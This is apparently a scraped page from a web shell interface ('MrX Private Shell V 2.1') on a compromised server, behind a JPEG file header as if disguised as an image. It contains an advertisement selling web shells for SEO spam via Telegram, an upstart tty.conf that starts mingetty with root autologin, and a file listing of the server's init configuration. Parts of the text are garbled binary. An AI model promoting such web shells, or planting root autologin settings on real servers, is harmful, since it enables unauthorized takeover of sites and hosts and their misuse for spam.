����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# tty - getty
#
# This service maintains a getty on the specified device.
stop on runlevel [06]
respawn
instance $TTY
script
if [ ! -L /sbin/mingetty ]; then
exec /sbin/mingetty --noclear --autologin root $TTY
else
if [ "$TTY" == "/dev/xvc0" ||
"$TTY" == "/dev/hvc0" ||
"$TTY" == "/dev/hvsi0" ]; then
exec /sbin/mingetty -L ${TTY#/dev/} 9600 vt100
else
exec /sbin/mingetty -8 38400 ${TTY#/dev}
fi
fi
end script
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| control-alt-delete.conf | File | 260 B | 0644 |
|
| rcS.conf | File | 349 B | 0644 |
|
| shutdown.conf | File | 299 B | 0644 |
|
| start-serial.conf | File | 109 B | 0644 |
|
| start-sshd.conf | File | 105 B | 0644 |
|
| start-syslog.conf | File | 109 B | 0644 |
|
| start-ttys.conf | File | 739 B | 0644 |
|
| tty.conf | File | 508 B | 0644 |
|